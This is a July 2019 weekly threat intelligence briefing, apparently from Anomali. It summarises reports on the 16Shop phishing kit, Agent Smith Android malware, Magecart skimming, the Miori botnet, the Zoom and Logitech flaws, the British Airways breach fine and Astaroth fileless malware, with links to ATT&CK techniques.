Weekly Threat Briefing: 'Agent Smith' The New Virus to Hit Mobile Devices

<div id="weekly"><p id="intro">The intelligence in this week’s iteration discuss the following threats: <strong>16Shop phishing kit, Agent Smith Android malware, Astaroth malware, Magecart, Miori botnet, </strong>and<strong> Zoom vulnerabilities</strong>. The IOCs related to these stories are attached to the Community Threat Briefing and can be used to check your logs for potential malicious activity.</p><div id="trending-threats"><h2 id="trendingthreats">Trending Threats</h2><p><a href="https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/16shop-now-targets-amazon/" target="_blank"><b>16Shop Now Targets Amazon</b></a> (<i>July 12, 2019</i>)<br/> McAfee Labs have identified a phishing kit, named “16Shop” being used to target Apple Account users to inputting payment details. Using a PDF file, the actors redirect users to a fake website. According to McAfee, the author of the kit is an individual involved with an Indonesian hacking group named “Indonesian Cyber Army”. The phishing kit is now targeting Amazon customers in a similar manner, in order to steal account holders’ information.<br/> <a href="https://forum.anomali.com/t/16shop-now-targets-amazon/3977" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&amp;CK] Spearphishing Link - T1192</a> | <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment - T1193</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&amp;CK] Web Service - T1102</a></p><p><a href="https://www.cybermdx.com/vulnerability-research-disclosures/ge-aestiva-and-ge-aespire" target="_blank"><b>Vulnerability Research &amp; Disclosures</b></a> (<i>July 11, 2019</i>)<br/> A vulnerability has been discovered by CyberMDX’s research teams affecting anesthesia delivery devices, GE Aestiva and GE Aespire. Connecting to a network to document dosages, and vital signs, an attacker could gain access to revert the device to an earlier, unsecure version of the communication protocol. An attack on the anesthesia devices could enable alterations of data and time, change anesthesia agent type, change barometric pressure settings, remotely silencing of alarms, and alter gas composition.<br/> <a href="https://forum.anomali.com/t/vulnerability-research-disclosures/3978" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947121">[MITRE ATT&amp;CK] Network Sniffing - T1040</a></p><p><a href="https://www.riskiq.com/blog/labs/magecart-amazon-s3-buckets/" target="_blank"><b>Spray and Pay: Magecart Campaign Breaches Websites En Masse Via Misconfigured Amazon S3 Buckets</b></a> (<i>July 10, 2019</i>)<br/> The threat type Magecart, a term for groups who compromise third-party web suppliers, has been found to be larger than initially suspected. RiskIQ have identified Magecart compromising misconfigured Amazon S3 buckets. Once identifying a misconfigured bucket, a group uses a skimming script and overwrite the current script, in an attempt to receive payment details.<br/> <a href="https://forum.anomali.com/t/spray-and-pay-magecart-campaign-breaches-websites-en-masse-via-misconfigured-amazon-s3-buckets/3979" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947137">[MITRE ATT&amp;CK] Supply Chain Compromise - T1195</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&amp;CK] Web Service - T1102</a> | <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting - T1064</a></p><p><a href="https://blog.checkpoint.com/2019/07/10/agent-smith-android-malware-mobile-phone-hack-virus-google/" target="_blank"><b>"Agent Smith:" The New Virus to Hit Mobile Devices</b></a> (<i>July 10, 2019</i>)<br/> Researchers at Check Point have identified a new mobile malware that has infected around 25 million devices. Mainly targeting users in Asian countries such as India and Bangladesh, the malware uses fraudulent adverts for financial gain. In order to deliver the malware on the mobile device, a user typically downloads a dropper disguised as a free game, that checks for applications on the device such as “MXplayer”, “Sharelt”, and “WhatsApp” which will be attacked at a later date. Using system vulnerabilities, the malware is installed unaware to the user, extracting an existing applications’ APK (Android Package file) and replacing it with malicious modules.<br/> <a href="https://forum.anomali.com/t/agent-smith-the-new-virus-to-hit-mobile-devices/3980" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution - T1204</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&amp;CK] Web Service - T1102</a> | <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools - T1219</a> | <a href="https://ui.threatstream.com/ttp/947138">[MITRE ATT&amp;CK] Exploit Public-Facing Application - T1190</a></p><p><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/new-miori-variant-uses-unique-protocol-to-communicate-with-cc/" target="_blank"><b>New Miori Variant Uses Unique Protocol to Communicate with C&amp;C</b></a> (<i>July 10, 2019</i>)<br/> A new Mirai variant, “Miori” discovered by TrendMicro last year, has reappeared using a new technique in how it communicates with the C2 server. Previously Mirai utilized binary-based communications with the C2 server, however, the “Miori” variant appears to utilize text-based protocols to communicate with the C2 server. Scanning vulnerable hosts, the malware sends IP and account information to the C2 server and executes a malicious script. Using XOR for encryption, the malware is similar to Mirai, with different decoding methods being used to further evade detection.<br/> <a href="https://forum.anomali.com/t/new-miori-variant-uses-unique-protocol-to-communicate-with-c-c/3981" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947227">[MITRE ATT&amp;CK] Brute Force - T1110</a> | <a href="https://ui.threatstream.com/ttp/947229">[MITRE ATT&amp;CK] Data Obfuscation - T1001</a> | <a href="https://ui.threatstream.com/ttp/947259">[MITRE ATT&amp;CK] Data Encoding - T1132</a></p><p><a href="https://www.bleepingcomputer.com/news/security/logitech-unifying-receivers-vulnerable-to-key-injection-attacks/" target="_blank"><b>Logitech Unifying Receivers Vulnerable to Key Injection Attacks</b></a> (<i>July 9, 2019</i>)<br/> Security researcher Marcus Mengs has discovered four new vulnerabilities affecting Logitech’s Unifying USB receivers, that allow users to connect multiple wireless Logitech devices to the same computer. Caused by outdated firmware, attackers with physical access to a target computer can enable keystroke records and attacks, as well as take control of the comprised system. With physical access an attacker is able to steal encryption keys from all paired devices, giving them the ability to inject arbitrary keystrokes as well as decrypt keyboard input remotely. Two flaws, CVE-2019-13052 and CVE-2019-13053 will not be patched by Logitech, while CVE-2019-13054 and CVE-2019-13055 will be patched in August 2019.<br/> <a href="https://forum.anomali.com/t/logitech-unifying-receivers-vulnerable-to-key-injection-attacks/3982" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947127">[MITRE ATT&amp;CK] Scheduled Task - T1053</a> | <a href="https://ui.threatstream.com/ttp/947121">[MITRE ATT&amp;CK] Network Sniffing - T1040</a></p><p><a href="https://thehackernews.com/2019/07/webcam-hacking-video-conferencing.html" target="_blank"><b>Flaw in Zoom Video Conferencing Software Lets Websites Hijack Mac Webcams</b></a> (<i>July 9, 2019</i>)<br/> Security researcher Jonathan Leitschuh has identified a vulnerability, CVE-2019-13450, in the Zoom Mac application. The vulnerability exploits the feature that allows users to click-to-join, however when the user joins, their webcam is automatically connected. Even with uninstalling the software, the flaw still exists, as the click-to-join feature automatically reinstalls Zoom without permission. Zoom, a video conferencing software has over four million users has not patched the vulnerability.<br/> <a href="https://forum.anomali.com/t/flaw-in-zoom-video-conferencing-software-lets-websites-hijack-mac-webcams/3983" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947138">[MITRE ATT&amp;CK] Exploit Public-Facing Application - T1190</a> | <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools - T1219</a> | <a href="https://ui.threatstream.com/ttp/947079">[MITRE ATT&amp;CK] Screen Capture - T1113</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&amp;CK] Web Service - T1102</a></p><p><a href="https://www.bbc.co.uk/news/business-48905907" target="_blank"><b>British Airways Faces Record £183m Fine For Data Breach</b></a> (<i>July 8, 2019</i>)<br/> The airline British Airways has been fined £183 million pounds after a 2018 breach of their system. Using a fake website, users were diverted to a site that stole the data of about 500,000 customers including address, login, name, payment card and travel details. The fine was due to British Airways not protecting against loss, damage or theft, with the highest fine since GDPR (General Data Protection Regulations) laws were enacted in April 2018. While British Airways claim there is no evidence of any fraudulent activity on the accounts that had been breached, reports from customers believe attempts were made.<br/> <a href="https://forum.anomali.com/t/british-airways-faces-record-183m-fine-for-data-breach/3984" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/1259983">[MITRE PRE-ATT&amp;CK] Identify sensitive personnel information (PRE-T1051)</a> | <a href="https://ui.threatstream.com/ttp/947263">[MITRE ATT&amp;CK] Spearphishing via Service - T1194</a></p><p><a href="https://www.bleepingcomputer.com/news/security/over-90-million-records-leaked-by-chinese-public-security-department/" target="_blank"><b>Over 90 Million Records Leaked by Chinese Public Security Department</b></a> (<i>July 8, 2019</i>)<br/> Two databases containing over 90 million personal and business records have been leaked by the Jiangsu Provincial Public Security Department has been discovered by security researcher Sanyam Jain. The ElasticSearch databases had been left publicly accessible and unsecure exposing birth dates, business IDs, business types, identity card numbers, location coordinates, gender, and name. After contacting the Jiangsu Provincial Public Security Department and CNERT/CC, CNERT/CC contacted the database owner who secured the database.<br/> <a href="https://forum.anomali.com/t/over-90-million-records-leaked-by-chinese-public-security-department/3985" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/1259983">[MITRE PRE-ATT&amp;CK] Identify sensitive personnel information (PRE-T1051)</a> | <a href="https://ui.threatstream.com/ttp/947138">[MITRE ATT&amp;CK] Exploit Public-Facing Application - T1190</a></p><p><a href=" https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/" target="_blank"><b>Dismantling a Fileless CampaignL Microsoft Defender ATP Next-Gen Protection Exposes Astaroth Attack</b></a> (<i>July 8, 2019</i>)<br/> A warning has been issued by Microsoft regarding fileless attacks spreading Astaroth malware. Astaroth malware steals sensitive information such as credentials, and keystrokes to use for theft or to sell to cyber criminals. Identified by Windows Defender ATP, users are sent emails with a malicious file attachment which, if downloaded, downloads malicious code that executes in memory, a fieless execution. This technique makes it more difficult for anti-virus software to identify.<br/> <a href="https://forum.anomali.com/t/dismantling-a-fileless-campaignl-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/3986" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&amp;CK] Spearphishing Link - T1192</a> | <a href="https://ui.threatstream.com/ttp/947077">[MITRE ATT&amp;CK] Windows Management Instrumentation - T1047</a> | <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting - T1064</a> | <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&amp;CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/1259909">[MITRE PRE-ATT&amp;CK] Buy domain name (PRE-T1105)</a> | <a href="https://ui.threatstream.com/ttp/947173">[MITRE ATT&amp;CK] Hooking - T1179</a> | <a href="https://ui.threatstream.com/ttp/947176">[MITRE ATT&amp;CK] Regsvr32 - T1117</a> | <a href="https://ui.threatstream.com/ttp/947088">[MITRE ATT&amp;CK] Execution through Module Load - T1129</a> | <a href="https://ui.threatstream.com/ttp/947136">[MITRE ATT&amp;CK] Deobfuscate/Decode Files or Information - T1140</a></p></div></div>